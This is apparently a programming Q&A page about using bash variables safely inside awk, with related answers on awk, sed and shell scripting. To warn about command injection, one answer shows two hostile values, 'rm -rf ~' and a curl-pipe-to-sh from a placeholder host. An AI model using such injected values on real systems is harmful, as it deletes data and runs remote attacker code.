awk: using bash variable inside the awk script - bash

The following bash script uses awk to merge file1 into file2: it detects certain marker lines in file2 and inserts the full contents of file1 at each of them.
#!/bin/bash
# v 0.09 beta
file1=/usr/data/temp/data1.pdb
file2=/usr/data/temp/data2.pdb
# merge both files
awk -v file="${file1}" '/^ENDMDL$/ {system("cat file");}; {print}' "${results}"/"${file2}" >> output.pdb
The problem is that inside the awk part I cannot use the variable "file", which refers to file1 as defined in bash:
{system("cat file");}
Otherwise, if I paste the full path of file1 here, it works well:
{system("cat /usr/data/temp/data1.pdb");}
How can I fix my awk code so that it can use a bash variable directly?

The Literal (But Evil, Insecure) Answer
To answer your literal question:
awk -v insecure="filename" 'BEGIN { system("cat " insecure) }'
...will run cat filename.
But if someone passed insecure="filename; rm -rf ~" or insecure='$(curl http://evil.co | sh)', you'd have a very bad day.
The Right Answer
Pass the filename on awk's command line, and check FNR to see if you're reading the first file or a subsequent one.
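A minimal sketch of that approach, assuming the file1 and file2 variables from the question. The sample data and the temporary directory are made up for illustration. While NR==FNR holds, awk is still reading the first file, so its lines are buffered; afterwards the buffer is printed before every ENDMDL line.

```shell
#!/bin/bash
# Hypothetical sample data standing in for data1.pdb and data2.pdb.
tmpdir=$(mktemp -d)
file1="$tmpdir/data1.pdb"
file2="$tmpdir/data2.pdb"
printf 'INSERTED 1\nINSERTED 2\n' > "$file1"
printf 'ATOM 1\nENDMDL\nATOM 2\nENDMDL\n' > "$file2"

# NR==FNR is true only while the first file is being read: buffer it, print nothing.
# For the second file, emit the buffer before each ENDMDL line, then the line itself.
merged=$(awk '
    NR == FNR  { buf = buf $0 ORS; next }
    /^ENDMDL$/ { printf "%s", buf }
               { print }
' "$file1" "$file2")

printf '%s\n' "$merged"
rm -rf "$tmpdir"
```

No shell data ever reaches system(), so there is nothing to inject. One caveat: the NR==FNR test misfires if the first file is empty, because the condition then stays true for the second file as well.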

Use GNU Awk's readfile library:
gawk -i readfile -v file1="$file1" 'BEGIN { file1_data = readfile(file1) }
/^ENDMDL$/ { printf "%s", file1_data } 1' ...
Alternatively, you can use a while ((getline < file1) > 0) loop to fetch the data.
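A sketch of the getline variant, which also works in awks without the readfile library. The sample files are hypothetical. getline returns 1 for each line read, 0 at end of file and -1 on error, which is why the loop condition compares against 0.

```shell
#!/bin/bash
# Hypothetical sample data standing in for data1.pdb and data2.pdb.
tmpdir=$(mktemp -d)
file1="$tmpdir/data1.pdb"
file2="$tmpdir/data2.pdb"
printf 'INSERTED 1\nINSERTED 2\n' > "$file1"
printf 'ATOM 1\nENDMDL\nATOM 2\n' > "$file2"

merged=$(awk -v file1="$file1" '
    BEGIN {
        # Read file1 line by line into one string; stop at EOF (0) or error (-1).
        while ((getline line < file1) > 0)
            data = data line ORS
        close(file1)
    }
    /^ENDMDL$/ { printf "%s", data }   # emit the buffered file before the marker
               { print }               # then print every line of file2
' "$file2")

printf '%s\n' "$merged"
rm -rf "$tmpdir"
```

Keep in mind that awk interprets backslash escapes in values passed with -v, so a filename containing backslashes would need extra care.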

This is easier with sed
$ sed '/^ENDMDL$/r file1' file2
This inserts file1 after the marker.
To replace the marker line with the contents of file1:
$ sed -e '/^ENDMDL$/{r file1' -e 'd}' file2
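A sketch of both sed forms using a shell variable instead of a literal file name. The sample data is made up, and the approach assumes the path in file1 contains no newline, since the r command takes everything up to the end of the line as the file name.

```shell
#!/bin/bash
# Hypothetical sample data.
tmpdir=$(mktemp -d)
file1="$tmpdir/data1.pdb"
file2="$tmpdir/data2.pdb"
printf 'INSERTED\n' > "$file1"
printf 'ATOM 1\nENDMDL\nATOM 2\n' > "$file2"

# Double quotes let the shell expand $file1; \$ keeps the regex anchor literal.
# Insert file1 after each marker line:
after=$(sed "/^ENDMDL\$/r $file1" "$file2")

# Replace each marker line with file1 (r queues the file, d drops the marker):
replaced=$(sed -e "/^ENDMDL\$/{r $file1" -e 'd}' "$file2")

printf 'after:\n%s\n\nreplaced:\n%s\n' "$after" "$replaced"
rm -rf "$tmpdir"
```

Note that neither form inserts the file before the marker, which is what the awk command in the question does.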

Related

Using a value stored in a different file in awk

I have a value stored in a file named cutoff1
If I cat cutoff1 it will look like
0.34722
I want to use the value stored in cutoff1 inside an awk script, something like the following:
awk '{ if ($1 >= 'cat cutoff1' print $1 }' hist1.dat >hist_oc1.dat
I think I am making a mistake somewhere. If I do it manually, it looks like this:
awk '{ if ($1 >= 0.34722) print $1 }' hist1.dat >hist_oc1.dat
How can I use the value stored in cutoff1 file inside the above mentioned awk script?
The easiest ways to achieve this are
awk -v cutoff="$(cat cutoff1)" '($1 >= cutoff){print $1}' hist.dat
awk -v cutoff="$(< cutoff1)" '($1 >= cutoff){print $1}' hist.dat
or
awk '(NR==FNR){cutoff=$1;next}($1 >= cutoff){print $1}' cutoff1 hist.dat
or
awk '($1 >= cutoff){print $1}' cutoff="$(cat cutoff1)" hist.dat
awk '($1 >= cutoff){print $1}' cutoff="$(< cutoff1)" hist.dat
Note: thanks to Glenn Jackman for pointing to this passage in man bash, under Command Substitution:
Bash performs the expansion by executing command and replacing the command substitution with the standard output of the command, with any trailing newlines deleted. Embedded newlines are not deleted, but they may be removed during word splitting. The command substitution $(cat file) can be replaced by the equivalent but faster $(< file).
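The -v form and the trailing cutoff=... form differ in one respect that the commands above do not show: a -v assignment is made before BEGIN runs, while an assignment given among the file operands is only made when awk reaches that argument. A small sketch with made-up data; the BEGIN block is added purely to make the difference visible.

```shell
#!/bin/bash
# Hypothetical sample data.
tmpdir=$(mktemp -d)
printf '0.34722\n' > "$tmpdir/cutoff1"
printf '0.1\n0.5\n' > "$tmpdir/hist.dat"

# -v: cutoff is already set when BEGIN runs.
with_v=$(awk -v cutoff="$(cat "$tmpdir/cutoff1")" '
    BEGIN { print "BEGIN sees [" cutoff "]" }
    $1 >= cutoff { print $1 }
' "$tmpdir/hist.dat")

# Operand assignment: cutoff is still empty in BEGIN, but set before hist.dat is read.
as_operand=$(awk '
    BEGIN { print "BEGIN sees [" cutoff "]" }
    $1 >= cutoff { print $1 }
' cutoff="$(cat "$tmpdir/cutoff1")" "$tmpdir/hist.dat")

printf '%s\n---\n%s\n' "$with_v" "$as_operand"
rm -rf "$tmpdir"
```

For the filter itself both forms give the same result; the difference only matters if the value is needed in BEGIN.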
Since awk can read multiple files, just put the cutoff file before your data file and treat its first line specially. There is no need to declare an external variable.
awk 'NR==1{cutoff=$1; next} $1>=cutoff{print $1}' cutoff data
PS: I just noticed that this is similar to @kvantour's second answer, but I'm keeping it here as a different flavor.
You could use getline to read a value from another file at your convenience. First the main file to process:
$ cat > file
wait
wait
did you see that
nothing more to see here
And cutoff:
$ cat cutoff
0.34722
An awk script that reads a line from cutoff when it meets the string see in a record:
$ awk '/see/{if((getline val < "cutoff") > 0) print val}1' file
wait
wait
0.34722
did you see that
nothing more to see here
Explained:
$ awk '
/see/ {                                 # when string see is in the line
    if((getline val < "cutoff") > 0)    # read a value from cutoff if there are any available
        print val                       # and output the value from cutoff
}1' file                                # output records from file
As there was only one value in cutoff, it was printed only once even though see was matched twice.

How to write a bash script that dumps itself out to stdout (for use as a help file)?

Sometimes I want a bash script that's mostly a help file. There are probably better ways to do things, but sometimes I want to just have a file called "awk_help" that I run, and it dumps my awk notes to the terminal.
How can I do this easily?
Another idea, use #!/bin/cat -- this will literally answer the title of your question since the shebang line will be displayed as well.
It turns out this can be done as pretty much a one-liner, thanks to @CharlesDuffy for the suggestions!
Just put the following at the top of the file, and you're done:
cat "$BASH_SOURCE" | grep -v EZREMOVEHEADER
So for my awk_help example, it'd be:
cat "$BASH_SOURCE" | grep -v EZREMOVEHEADER
# Basic form of all awk commands
awk search pattern { program actions }
# advanced awk
awk 'BEGIN {init} search1 {actions} search2 {actions} END { final actions }' file
# awk boolean example for matching "(me OR you) OR (john AND ! doe)"
awk '( /me|you/ ) || (/john/ && ! /doe/ )' /path/to/file
# awk - print # of lines in file
awk 'END {print NR,"coins"}' coins.txt
# Sum up gold ounces in column 2, and find out value at $425/ounce
awk '/gold/ {ounces += $2} END {print "value = $" 425*ounces}' coins.txt
# Print the last column of each line in a file, using a comma (instead of space) as a field separator:
awk -F ',' '{print $NF}' filename
# Sum the values in the first column and pretty-print the values and then the total:
awk '{s+=$1; print $1} END {print "--------"; print s}' filename
# functions available
length($0) > 72, toupper,tolower
# count the # of times the word PASSED shows up in the file /tmp/out
cat /tmp/out | awk 'BEGIN {X=0} /PASSED/{X+=1; print $1 X}'
# awk regex operators
https://www.gnu.org/software/gawk/manual/html_node/Regexp-Operators.html
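One thing to watch with this approach: after the grep line, bash keeps going and tries to run the notes as commands. The comment lines are harmless, but the example commands are not. A minimal sketch that stops the script explicitly, assuming an added exit line that carries the same marker so it is filtered out too. The awk_help path and the shortened notes are hypothetical.

```shell
#!/bin/bash
# Build a small self-dumping help script in a temporary directory.
tmpdir=$(mktemp -d)
cat > "$tmpdir/awk_help" <<'EOF'
#!/bin/bash
grep -v -e EZREMOVEHEADER -e '^#!' "$BASH_SOURCE"
exit 0 # EZREMOVEHEADER: stop here so the notes below are never executed
# Basic form of all awk commands
awk search pattern { program actions }
EOF

# Run it through bash; only the notes should come out.
help_text=$(bash "$tmpdir/awk_help")
printf '%s\n' "$help_text"
rm -rf "$tmpdir"
```

The extra -e '^#!' pattern is an addition of this sketch that also hides the shebang line; drop it if you want the shebang to be shown.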
I found another solution that works on Mac/Linux and works exactly as one would hope.
Just use the following as your "shebang" line, and it'll output everything from line 2 on down:
test.sh
#!/usr/bin/tail -n+2
hi there
how are you
Running this gives you what you'd expect:
$ ./test.sh
hi there
how are you
Another possible solution: just use less as the interpreter, so that the file opens in a searchable pager:
#!/usr/bin/less
This way you can still grep it for something too, e.g.
$ ./test.sh | grep something

awk load one file into array, test against another file

I have two files:
seqs.fa:
>seq000007;size=72768;
ACTGTGAG
>seq000010;size=53132;
GTAAGATC
GAATTCTT
>seq00045;size=40321;
ACCCATTT
...
numbers.txt
72768
53132
My desired output would be the lines from the first file that match a number from the second file:
>seq000007;size=72768;
>seq000010;size=53132;
I attempted to use awk, but it only returns lines matching the first number:
awk -F"\n" -v RS=">" 'NR==FNR{for(i=1;i<=NF;i++) A[$i]; next} END {for (header in A) {if ( match(header,$1) ) {print header}}}' seqs.fa numbers.txt
seq000007;size=72768;
seq072768;size=1;
Why is awk only looping through the "header" array for the first line in numbers.txt? And, if this is an XY problem, is there a better way to accomplish this goal?
After fixing the typo in your numbers file:
$ awk -F'=|;' 'NR==FNR{a[$1]; next}; $3 in a' numbers.txt seqs.fa
>seq000007;size=72768;
>seq000010;size=53132;
In this special case you can use GNU grep like this:
grep -F -f numbers.txt seqs.fa
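The option -f filename uses all the patterns found in filename for the search. The option -F tells grep that the patterns are simple fixed strings. Note that a fixed string matches anywhere on the line, so a header such as >seq072768;size=1; would also match 72768.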
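To see how the two answers differ, here is a sketch that runs both on made-up data containing a header whose sequence name happens to include one of the numbers. The awk version loads numbers.txt into an array and then tests only the size field; the grep version matches the number anywhere on the line.

```shell
#!/bin/bash
# Hypothetical sample data, including a tricky header (seq072768).
tmpdir=$(mktemp -d)
cat > "$tmpdir/seqs.fa" <<'EOF'
>seq000007;size=72768;
ACTGTGAG
>seq000010;size=53132;
GTAAGATC
>seq072768;size=1;
ACCCATTT
EOF
printf '72768\n53132\n' > "$tmpdir/numbers.txt"

# With FS set to "=" or ";", a header splits into: >name, size, NUMBER, (empty).
awk_hits=$(awk -F'=|;' '
    NR == FNR { wanted[$1]; next }   # first file: remember each number as an array key
    $3 in wanted                     # second file: print lines whose size field is a key
' "$tmpdir/numbers.txt" "$tmpdir/seqs.fa")

# Fixed-string search: matches the number anywhere on the line.
grep_hits=$(grep -F -f "$tmpdir/numbers.txt" "$tmpdir/seqs.fa")

printf 'awk:\n%s\n\ngrep:\n%s\n' "$awk_hits" "$grep_hits"
rm -rf "$tmpdir"
```

On this data awk prints the two intended headers, while grep also prints the seq072768 header.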

Shell: Substitute a string between 2 known strings

I wish to replace the version string between abc_def_APP and application1.war in file1 with the contents of the new_version variable (13.2.0/8).
Script :
#!/bin/ksh
new_version="13.0.5/8"
old_version=($(grep -r "location=.*application1.war" /path/file1| awk '{print ($1)}'| cut -f8- -d"/"|sed 's/.\{1\}$//'))
echo "$old_version"  # This gives me the version number from file1 which needs to be replaced (13.2.0/9)
File1 Contents:
location="cc://view/blah/blah/blah/abc_def_APP/13.2.0/9/application1.war"
Use the following sed command to do the replacement (new_version is the variable from your script):
sed -i.bak -r "s#^(.*/abc_def_APP/).*(/application1\.war.*)#\1${new_version}\2#" /path/file1
With GNU awk (for gensub()):
$ cat file
location="cc://view/blah/blah/blah/abc_def_APP/13.2.0/9/application1.war"
$ new_version="13.2.0/8"
$ gawk -v nv="$new_version" '{$0=gensub(/^(location.*abc_def_APP\/).*(\/application1.war.*)/,"\\1" nv "\\2","")}1' file
location="cc://view/blah/blah/blah/abc_def_APP/13.2.0/8/application1.war"
The difference between this and a sed solution is that awk doesn't require you to jump through hoops due to your new_version variable containing a "/" (or any other character).

Explode to Array

I put together this shell script to do two things:
Change the delimiters in a data file ('::' to ',' in this case)
Select the columns I want and append them to a new file
It works but I want a better way to do this. I specifically want to find an alternative method for exploding each line into an array. Using command line arguments doesn't seem like the way to go. ANY COMMENTS ARE WELCOME.
# Takes a ::-separated file as the 1st parameter
SOURCE=$1
# create csv target file
TARGET=${SOURCE/dat/csv}
touch $TARGET
# quote the header: an unquoted # would start a comment and nothing would be written
echo "#userId,itemId" > $TARGET
IFS=","
while read LINE
do
# Replaces all matches of :: with a ,
CSV_LINE=${LINE//::/,}
set -- $CSV_LINE
echo "$1,$2" >> $TARGET
done < $SOURCE
Instead of set, you can use an array:
arr=($CSV_LINE)
echo "${arr[0]},${arr[1]}"
The following would print columns 1 and 2 from infile.dat. Replace $1, $2 with a comma-separated list of the numbered columns you do want.
awk 'BEGIN { FS = "::"; OFS = "," } { print $1, $2 }' infile.dat > infile.csv
Perl probably has a 1 liner to do it.
Awk can probably do it easily too.
My first reaction is a combination of awk and sed:
Sed to convert the delimiters
Awk to process specific columns
cat inputfile | sed -e 's/::/,/g' | awk -F, '{print $1, $2}'
# Or, to avoid a UUOC award (and prolong the life of your keyboard by 3 characters):
sed -e 's/::/,/g' inputfile | awk -F, '{print $1, $2}'
awk is indeed the right tool for the job here, it's a simple one-liner.
$ cat test.in
a::b::c
d::e::f
g::h::i
$ awk -F:: -v OFS=, '{$1=$1;print;print $2,$3 >> "altfile"}' test.in
a,b,c
d,e,f
g,h,i
$ cat altfile
b,c
e,f
h,i
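Applied to the original script, the whole loop can be collapsed into one awk call. A sketch, assuming the input has the same ::-separated layout as in the question. The sample rows and the ratings.dat name are invented for illustration.

```shell
#!/bin/bash
# Hypothetical ::-separated input file.
tmpdir=$(mktemp -d)
source_file="$tmpdir/ratings.dat"
printf '1::1193::5::978300760\n1::661::3::978302109\n' > "$source_file"

# Same naming idea as in the question: swap the .dat suffix for .csv.
target_file="${source_file%.dat}.csv"

# Split on "::", join output fields with ",", write the header once, keep columns 1 and 2.
awk -F'::' -v OFS=',' '
    BEGIN { print "#userId,itemId" }
          { print $1, $2 }
' "$source_file" > "$target_file"

csv=$(cat "$target_file")
printf '%s\n' "$csv"
rm -rf "$tmpdir"
```

This avoids both the per-line shell loop and the need to change IFS for the rest of the script.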
$

Resources